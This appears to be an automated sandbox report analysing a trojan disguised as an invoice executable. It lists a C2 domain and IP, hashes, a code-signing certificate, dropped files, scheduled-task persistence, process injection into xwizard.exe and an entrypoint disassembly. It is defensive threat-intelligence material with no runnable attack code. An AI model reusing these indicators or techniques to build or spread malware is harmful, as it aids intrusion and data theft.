Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	Remote System Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
30.2.xwizard.exe.400000.0.unpack	100%	Avira	TR/Spy.Gen	Download File
13.2.important invoice presentation nov 2021.exe.1cf00000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
14.2.xwizard.exe.400000.0.unpack	100%	Avira	TR/Spy.Gen	Download File
1.2.important invoice presentation nov 2021.exe.1c8f0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://www.yandex.comsocks=	0%	Avira URL Cloud	safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	0%	URL Reputation	safe
https://sectigo.com/CPS0D	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	0%	URL Reputation	safe
calibare5454.pro:3360	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
calibare5454.pro	51.195.57.233	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
calibare5454.pro:3360	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	important invoice presentation nov 2021.exe	false	URL Reputation: safe	unknown
https://sectigo.com/CPS0	important invoice presentation nov 2021.exe	false	URL Reputation: safe	unknown
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y	important invoice presentation nov 2021.exe	false	URL Reputation: safe	unknown
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	important invoice presentation nov 2021.exe	false	URL Reputation: safe	unknown
http://ocsp.sectigo.com0	important invoice presentation nov 2021.exe	false	URL Reputation: safe	unknown
http://www.yandex.comsocks=	important invoice presentation nov 2021.exe, 00000001.00000002.507835553.000000001C8F0000.00000040.00000001.sdmp, important invoice presentation nov 2021.exe, 0000000D.00000002.683551594.000000001CF00000.00000040.00000001.sdmp, xwizard.exe, 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp, xwizard.exe, 0000001E.00000002.688394318.0000000000422000.00000004.00020000.sdmp	false	Avira URL Cloud: safe	low
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	important invoice presentation nov 2021.exe	false	URL Reputation: safe	unknown
https://sectigo.com/CPS0D	important invoice presentation nov 2021.exe	false	URL Reputation: safe	unknown
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#	important invoice presentation nov 2021.exe	false	URL Reputation: safe	unknown
http://www.xnview.com	important invoice presentation nov 2021.exe	false		high
http://www.yandex.com	xwizard.exe	false		high
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	important invoice presentation nov 2021.exe	false	URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
51.195.57.233	calibare5454.pro	France		16276	OVHFR	true

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	523630
Start date:	17.11.2021
Start time:	14:31:45
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 25s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	important invoice presentation nov 2021.pif (renamed file extension from pif to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	35
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal84.troj.spyw.evad.winEXE@26/2@1/1
EGA Information:	Successful, ratio: 66.7%
HDC Information:	Successful, ratio: 91.9% (good quality ratio 46%) Quality average: 39.4% Quality standard deviation: 44%
HCA Information:	Successful, ratio: 94% Number of executed functions: 60 Number of non-executed functions: 352
Cookbook Comments:	Adjust boot time Enable AMSI Override analysis time to 240s for sample files taking high CPU consumption
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, HxTsr.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 40.126.31.140, 40.126.31.138, 40.126.31.136, 20.190.159.135, 20.190.159.137, 40.126.31.7, 40.126.31.9, 40.126.31.5, 51.104.136.2, 51.11.168.232, 20.49.150.241 Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, www.tm.lg.prod.aadmsa.akadns.net, ctldl.windowsupdate.com, settings-win.data.microsoft.com, arc.msn.com, login.msa.msidentity.com, www.tm.a.prd.aadg.trafficmanager.net, settingsfd-geo.trafficmanager.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, login.live.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, cdn.onenote.net Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing disassembly code. Report size getting too big, too many NtAllocateVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
14:33:51	Task Scheduler	Run new task: Security path: C:\Program s>Files (x86)\Security\important invoice presentation nov 2021.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
51.195.57.233	4opi0b3gZn.exe	Get hash	malicious	Browse
	fGh96VozUi.exe	Get hash	malicious	Browse
	cTpmz8G3Ob.exe	Get hash	malicious	Browse
	DigiCertUtil.exe	Get hash	malicious	Browse
	FireFoxExtension.exe	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
OVHFR	XE7c64PfoP.exe	Get hash	malicious	Browse	91.134.150.150
	3AgSx1cQFE.exe	Get hash	malicious	Browse	51.81.139.72
	982tSWUdff.dll	Get hash	malicious	Browse	158.69.222.101
	ji2TXozBAl.dll	Get hash	malicious	Browse	158.69.222.101
	N6CyMVFTbm.dll	Get hash	malicious	Browse	158.69.222.101
	ji2TXozBAl.dll	Get hash	malicious	Browse	158.69.222.101
	index.dll	Get hash	malicious	Browse	51.68.175.8
	lUynlGo56B9U3mQG.dll	Get hash	malicious	Browse	51.178.61.60
	Ttj0AuTKHQ.dll	Get hash	malicious	Browse	51.178.61.60
	KgtyOfJo2W.dll	Get hash	malicious	Browse	51.178.61.60
	h5ZcTHDXbJ.dll	Get hash	malicious	Browse	51.178.61.60
	SCygJvetwW.dll	Get hash	malicious	Browse	51.68.175.8
	a5uyawQx9G.dll	Get hash	malicious	Browse	158.69.222.101
	bymJNhzejq.dll	Get hash	malicious	Browse	158.69.222.101
	DOC_1003394276473336675207.docm	Get hash	malicious	Browse	158.69.222.101
	Pending Invoice 38129337.exe	Get hash	malicious	Browse	54.38.220.85
	File#BOL.exe	Get hash	malicious	Browse	51.83.52.225
	60039DF63E861FBDABF05185173E4A6937A8813A9C499.exe	Get hash	malicious	Browse	66.70.218.54
	Report.docm	Get hash	malicious	Browse	158.69.222.101
	CyNu4YFki4.dll	Get hash	malicious	Browse	158.69.222.101

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe Download File
Process:	C:\Windows\SysWOW64\xcopy.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3391296
Entropy (8bit):	6.764334303023271
Encrypted:	false
SSDEEP:	98304:s1zCQ5fFa1BJLhjtX5yI3FwzLhYsJLIy38X79Tg:s1zCesBPny2y38X79T
MD5:	1364844E0BFB349272C5050FB0E677E3
SHA1:	FFC57AD66C9A3764A88A2B2C3EC1F0F19042C77A
SHA-256:	004F011B37E4446FA04B76AAE537CC00F6588C0705839152AE2D8A837EF2B730
SHA-512:	82AD807D0AE5D34D49A9DE38F02BA5096BF4B80DF8A58F1E9F2FF9FA53AE04B3B58C584CD19E62B996D63FE4E3FE1B1FDCC6C5C7433FBA7A07D19D4103EE82D3
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2..v..v..v..b..j..b..W..b.......e.....o........b..t..b..S..v..~....~.....w....w..Richv..........................PE..L....q.a..................".........N........."...@...........................4.......3...@...................................).\|.....+..O............3.@)....1. .....'.......................'.......'.@.............".h............................text....."......."................. ..`.rdata..8K...."..L....".............@..@.data........0..2.................@....rsrc....O....+..P...N+.............@..@.reloc.. .....1.......0.............@..B........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Security\important invoice presentation nov 2021.exe:Zone.Identifier Download File
Process:	C:\Windows\SysWOW64\xcopy.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.764334303023271
TrID:	Win32 Executable (generic) a (10002005/4) 98.81% Windows ActiveX control (116523/4) 1.15% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	important invoice presentation nov 2021.exe
File size:	3391296
MD5:	1364844e0bfb349272c5050fb0e677e3
SHA1:	ffc57ad66c9a3764a88a2b2c3ec1f0f19042c77a
SHA256:	004f011b37e4446fa04b76aae537cc00f6588c0705839152ae2d8a837ef2b730
SHA512:	82ad807d0ae5d34d49a9de38f02ba5096bf4b80df8a58f1e9f2ff9fa53ae04b3b58c584cd19e62b996d63fe4e3fe1b1fdcc6c5c7433fba7a07d19d4103ee82d3
SSDEEP:	98304:s1zCQ5fFa1BJLhjtX5yI3FwzLhYsJLIy38X79Tg:s1zCesBPny2y38X79T
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2...v...v...v...b...j...b...W...b...........e.......o...........b...t...b...S...v...~.......~.......w.......w...Richv..........

File Icon


Icon Hash:	69ab96a6a6dc6891

Static PE Info

General
Entrypoint:	0x5c944e
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x61907180 [Sun Nov 14 02:16:32 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	928ca23958b7b89682da5497b37038ac

Authenticode Signature

Signature Valid:	true
Signature Issuer:	CN=Sectigo Public Code Signing CA R36, O=Sectigo Limited, C=GB
Signature Validation Error:	The operation completed successfully
Error Number:	0
Not Before, Not After	11/11/2021 4:00:00 PM 11/12/2022 3:59:59 PM
Subject Chain	CN=ULTRA ACADEMY LTD, O=ULTRA ACADEMY LTD, S=London, C=GB
Version:	3
Thumbprint MD5:	BCAF7BE878249CC7571201AE00B95303
Thumbprint SHA-1:	E94AD249747FD4B88750B2CD6D8D65AD33D3566D
Thumbprint SHA-256:	0D358ADC3623D52FBF1EC26ACAEBBEE7AFC73082276B60DE1FE51F59E4B4AEBC
Serial:	387EEB89B8BF626BBF4C7C9F5B998B40

Entrypoint Preview

Instruction
call 00007FC524AAFEC0h
jmp 00007FC524AAEAF5h
push 00000014h
push 0069DC58h
call 00007FC524AAEFB1h
push 00000001h
call 00007FC524AAE5F3h
pop ecx
test al, al
je 00007FC524AAEC40h
xor bl, bl
mov byte ptr [ebp-19h], bl
and dword ptr [ebp-04h], 00000000h
call 00007FC524AAE4E1h
mov byte ptr [ebp-24h], al
mov eax, dword ptr [006B9B14h]
xor ecx, ecx
inc ecx
cmp eax, ecx
je 00007FC524AAEC1Fh
test eax, eax
jne 00007FC524AAEB3Bh
mov dword ptr [006B9B14h], ecx
push 0062EF74h
push 0062EF4Ch
call 00007FC524AE086Bh
pop ecx
pop ecx
test eax, eax
je 00007FC524AAEB03h
mov dword ptr [ebp-04h], FFFFFFFEh
mov eax, 000000FFh
jmp 00007FC524AAEBDEh
push 0062EF48h
push 0062EC74h
call 00007FC524AE0800h
pop ecx
pop ecx
mov dword ptr [006B9B14h], 00000002h
jmp 00007FC524AAEAF7h
mov bl, cl
mov byte ptr [ebp-19h], bl
push dword ptr [ebp-24h]
call 00007FC524AAE6C4h
pop ecx
call 00007FC524AAFED4h
mov esi, eax
xor edi, edi
cmp dword ptr [esi], edi
je 00007FC524AAEB0Dh
push esi
call 00007FC524AAE61Ch
pop ecx
test al, al
je 00007FC524AAEB02h
mov esi, dword ptr [esi]
push edi
push 00000002h
push edi
mov ecx, esi
call dword ptr [0062EC68h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x29e8f4	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2bb000	0x54fdc	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x339600	0x2940	.reloc
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x310000	0x2f620	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x278af8	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x278c80	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x278b18	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x22e000	0xc68	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x22cac9	0x22cc00	unknown	unknown	unknown	unknown	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x22e000	0x74b38	0x74c00	False	0.342708612152	data	5.50911370588	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x2a3000	0x17f0c	0x13200	False	0.680695976307	data	7.16739114428	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x2bb000	0x54fdc	0x55000	False	0.794674862132	data	7.15845808893	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x310000	0x2f620	0x2f800	False	0.469078947368	data	6.58652778609	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_CURSOR	0x2bbc78	0x134	data	English	United States
RT_CURSOR	0x2bbdac	0xb4	data	English	United States
RT_CURSOR	0x2bbe60	0x134	AmigaOS bitmap font	English	United States
RT_CURSOR	0x2bbf94	0x134	data	English	United States
RT_CURSOR	0x2bc0c8	0x134	data	English	United States
RT_CURSOR	0x2bc1fc	0x134	data	English	United States
RT_CURSOR	0x2bc330	0x134	data	English	United States
RT_CURSOR	0x2bc464	0x134	data	English	United States
RT_CURSOR	0x2bc598	0x134	data	English	United States
RT_CURSOR	0x2bc6cc	0x134	data	English	United States
RT_CURSOR	0x2bc800	0x134	data	English	United States
RT_CURSOR	0x2bc934	0x134	data	English	United States
RT_CURSOR	0x2bca68	0x134	AmigaOS bitmap font	English	United States
RT_CURSOR	0x2bcb9c	0x134	data	English	United States
RT_CURSOR	0x2bccd0	0x134	data	English	United States
RT_CURSOR	0x2bce04	0x134	data	English	United States
RT_BITMAP	0x2bcf38	0xb8	data	English	United States
RT_BITMAP	0x2bcff0	0x144	data	English	United States
RT_ICON	0x2bd134	0xf6da	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States
RT_ICON	0x2cc810	0x10828	dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0	English	United States
RT_ICON	0x2dd038	0x4228	dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 260112383, next used block 4294902256	English	United States
RT_ICON	0x2e1260	0x25a8	data	English	United States
RT_ICON	0x2e3808	0x10a8	data	English	United States
RT_ICON	0x2e48b0	0x988	data	English	United States
RT_ICON	0x2e5238	0x468	GLS_BINARY_LSB_FIRST	English	United States
RT_DIALOG	0x2e56a0	0x146	data	English	United States
RT_DIALOG	0x2e57e8	0x3e0	data	English	United States
RT_DIALOG	0x2e5bc8	0xe8	data	English	United States
RT_DIALOG	0x2e5cb0	0x34	data	English	United States
RT_STRING	0x2e5ce4	0x148	data	English	United States
RT_STRING	0x2e5e2c	0x82	data	English	United States
RT_STRING	0x2e5eb0	0x2a	data	English	United States
RT_STRING	0x2e5edc	0x184	data	English	United States
RT_STRING	0x2e6060	0x4ee	data	English	United States
RT_STRING	0x2e6550	0x264	data	English	United States
RT_STRING	0x2e67b4	0x2da	data	English	United States
RT_STRING	0x2e6a90	0x8a	data	English	United States
RT_STRING	0x2e6b1c	0xac	data	English	United States
RT_STRING	0x2e6bc8	0xde	data	English	United States
RT_STRING	0x2e6ca8	0x4a8	data	English	United States
RT_STRING	0x2e7150	0x228	data	English	United States
RT_STRING	0x2e7378	0x2c	data	English	United States
RT_STRING	0x2e73a4	0x53e	data	English	United States
RT_RCDATA	0x2e78e4	0x28250	data
RT_GROUP_CURSOR	0x30fb34	0x22	Lotus unknown worksheet or configuration, revision 0x2	English	United States
RT_GROUP_CURSOR	0x30fb58	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0x30fb6c	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0x30fb80	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0x30fb94	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0x30fba8	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0x30fbbc	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0x30fbd0	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0x30fbe4	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0x30fbf8	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0x30fc0c	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0x30fc20	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0x30fc34	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0x30fc48	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0x30fc5c	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_ICON	0x30fc70	0x68	data	English	United States
RT_VERSION	0x30fcd8	0x304	data	English	United States

Imports

DLL	Import
ACTIVEDS.dll
KERNEL32.dll	GetEnvironmentStringsW, IsValidCodePage, FindNextFileW, FindFirstFileExW, SetFilePointerEx, ReadConsoleW, GetConsoleMode, GetConsoleOutputCP, GetStringTypeW, GetTimeZoneInformation, EnumSystemLocalesW, IsValidLocale, LCMapStringW, CompareStringW, GetTimeFormatW, GetDateFormatW, SetEnvironmentVariableW, GetFileType, SetStdHandle, QueryPerformanceFrequency, HeapQueryInformation, GetCommandLineW, GetCommandLineA, GetModuleHandleExW, FreeLibraryAndExitThread, ExitThread, CreateThread, VirtualQuery, GetSystemInfo, InterlockedFlushSList, InterlockedPushEntrySList, RtlUnwind, OutputDebugStringW, FreeEnvironmentStringsW, SetConsoleCtrlHandler, CreateFileW, GetStdHandle, ExitProcess, VirtualAlloc, LoadResource, LockResource, SizeofResource, FindResourceW, LocalFree, FormatMessageA, MultiByteToWideChar, WideCharToMultiByte, DecodePointer, RaiseException, GetLastError, HeapDestroy, HeapAlloc, HeapReAlloc, HeapFree, HeapSize, GlobalHandle, GetProcessHeap, InitializeCriticalSectionEx, DeleteCriticalSection, SetLastError, GlobalAlloc, GlobalSize, GlobalUnlock, GlobalLock, GlobalFree, MulDiv, CopyFileA, OutputDebugStringA, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleW, GetProcAddress, LoadLibraryA, LoadLibraryW, FindResourceA, CloseHandle, SetEvent, WaitForSingleObject, CreateEventA, GetCurrentThreadId, SetThreadPriority, SuspendThread, ResumeThread, GetCurrentThread, GetVersionExA, FreeLibrary, GetModuleFileNameA, LoadLibraryExW, GlobalDeleteAtom, lstrcmpA, CompareStringA, GetPrivateProfileIntA, GetPrivateProfileStringA, WritePrivateProfileStringA, GlobalAddAtomA, GetCurrentProcessId, EncodePointer, GetSystemDirectoryW, lstrcmpW, GlobalFindAtomA, GlobalGetAtomNameA, FileTimeToSystemTime, SystemTimeToFileTime, GetThreadLocale, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, InitializeCriticalSection, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GlobalReAlloc, WriteConsoleW, LocalAlloc, LocalReAlloc, GetAtomNameA, GlobalFlags, GetACP, GetCurrentDirectoryA, GetLocaleInfoW, GetSystemDefaultUILanguage, GetUserDefaultUILanguage, DeleteFileA, CreateFileA, FindClose, FindFirstFileA, FlushFileBuffers, GetFileSize, GetFullPathNameA, LockFile, ReadFile, SetEndOfFile, SetFilePointer, UnlockFile, WriteFile, GetVolumeInformationA, DuplicateHandle, GetCurrentProcess, LoadLibraryExA, GetShortPathNameA, lstrcmpiA, MoveFileA, GetStringTypeExA, lstrcpyA, VirtualProtect, GetOEMCP, GetCPInfo, GetWindowsDirectoryA, SetErrorMode, FileTimeToLocalFileTime, GetFileAttributesA, GetFileAttributesExA, GetFileSizeEx, GetFileTime, LocalFileTimeToFileTime, SetFileAttributesA, SetFileTime, SystemTimeToTzSpecificLocalTime, VerSetConditionMask, VerifyVersionInfoA, FindResourceExW, GetTempPathA, GetTickCount, GetProfileIntA, SearchPathA, Sleep, GetDiskFreeSpaceA, GetTempFileNameA, ReplaceFileA, GetUserDefaultLCID, LocalLock, LocalUnlock, ResetEvent, WaitForSingleObjectEx, CreateEventW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetSystemTimeAsFileTime, InitializeSListHead
USER32.dll	HideCaret, EnableScrollBar, MessageBeep, GetIconInfo, DrawIconEx, IsRectEmpty, DrawFocusRect, GetNextDlgGroupItem, ReuseDDElParam, UnpackDDElParam, GetMenuBarInfo, LoadImageA, InsertMenuItemA, LoadMenuA, TranslateAcceleratorA, LoadAcceleratorsA, BringWindowToTop, GetMenuDefaultItem, CreatePopupMenu, MapDialogRect, GetAsyncKeyState, LoadImageW, TrackMouseEvent, LoadCursorW, WindowFromPoint, ReleaseCapture, SetCapture, WaitMessage, CharUpperA, DestroyIcon, InvalidateRect, KillTimer, SetTimer, DeleteMenu, CopyImage, GetDialogBaseUnits, RealChildWindowFromPoint, IntersectRect, LoadCursorA, GetSysColorBrush, IsDialogMessageA, SetWindowTextA, ScrollWindowEx, IsDlgButtonChecked, CheckRadioButton, CheckDlgButton, GetDlgItemTextA, SetDlgItemTextA, GetDlgItemInt, SetDlgItemInt, MoveWindow, ShowWindow, GetMonitorInfoA, MonitorFromWindow, WinHelpA, GetScrollInfo, SetScrollInfo, LoadIconA, GetTopWindow, GetClassNameA, GetClassLongA, SetWindowLongA, PtInRect, EqualRect, MapWindowPoints, AdjustWindowRectEx, GetWindowRect, RemovePropA, GetPropA, SetPropA, ShowScrollBar, GetScrollRange, SetScrollRange, ScrollWindow, RedrawWindow, InvertRect, GetForegroundWindow, UpdateWindow, TrackPopupMenuEx, TrackPopupMenu, SetMenu, GetMenu, GetCapture, GetDlgCtrlID, SetClassLongA, DeferWindowPos, BeginDeferWindowPos, SetWindowPlacement, GetWindowPlacement, SetWindowPos, IsChild, IsMenu, CreateWindowExA, GetClassInfoExA, GetClassInfoA, RegisterClassA, CallWindowProcA, DefWindowProcA, GetMessageTime, GetMessagePos, RegisterWindowMessageA, OffsetRect, SetRectEmpty, SendDlgItemMessageA, GetWindow, GetWindowTextLengthA, GetWindowTextA, GetScrollPos, SetScrollPos, SetFocus, SystemParametersInfoA, InflateRect, SetWindowRgn, SetParent, DrawEdge, GetMenuItemCount, InsertMenuA, RemoveMenu, IsWindow, GetKeyNameTextA, GetMenuItemInfoA, DestroyMenu, FillRect, GetSysColor, ScreenToClient, ClientToScreen, EndPaint, BeginPaint, GetWindowDC, TabbedTextOutA, GrayStringA, DrawTextExA, DrawTextA, UnhookWindowsHookEx, GetLastActivePopup, GetWindowThreadProcessId, DrawFrameControl, IsZoomed, LoadMenuW, SetCursorPos, CopyIcon, SendMessageA, IsIconic, EnableWindow, GetSystemMetrics, GetSystemMenu, AppendMenuA, DrawIcon, FrameRect, NotifyWinEvent, MessageBoxA, SetCursor, SetLayeredWindowAttributes, EnumDisplayMonitors, OpenClipboard, CloseClipboard, SetClipboardData, EmptyClipboard, SetForegroundWindow, DrawStateA, MapVirtualKeyA, GetDC, ReleaseDC, CopyRect, GetFocus, CheckMenuItem, EnableMenuItem, SetMenuItemBitmaps, GetMenuCheckMarkDimensions, SetMenuItemInfoA, GetParent, LoadBitmapW, DestroyWindow, CreateDialogIndirectParamA, EndDialog, GetDlgItem, GetNextDlgTabItem, GetActiveWindow, IsWindowEnabled, SetActiveWindow, GetWindowLongA, GetDesktopWindow, GetMessageA, TranslateMessage, DispatchMessageA, PeekMessageA, IsWindowVisible, GetKeyState, ValidateRect, GetCursorPos, SetWindowsHookExA, CallNextHookEx, PostMessageA, PostQuitMessage, ShowOwnedPopups, GetClientRect, LoadIconW, UnregisterClassA, GetMenuStringA, GetMenuState, GetMenuItemID, GetTabbedTextExtentW, GetTabbedTextExtentA, DestroyCursor, GetWindowRgn, WindowFromDC, CreateMenu, InSendMessage, MonitorFromRect, SendNotifyMessageA, SubtractRect, TranslateMDISysAccel, DefMDIChildProcA, DefFrameProcA, DrawMenuBar, EnumChildWindows, GetDCEx, GetUpdateRect, IsClipboardFormatAvailable, CharUpperBuffA, RegisterClipboardFormatA, ModifyMenuA, GetDoubleClickTime, SetMenuDefaultItem, LockWindowUpdate, SetRect, CopyAcceleratorTableA, DestroyAcceleratorTable, CreateAcceleratorTableA, LoadAcceleratorsW, ToAsciiEx, GetKeyboardState, MapVirtualKeyExA, IsCharLowerA, GetKeyboardLayout, PostThreadMessageA, GetComboBoxInfo, MonitorFromPoint, UpdateLayeredWindow, UnionRect, EndDeferWindowPos, GetSubMenu
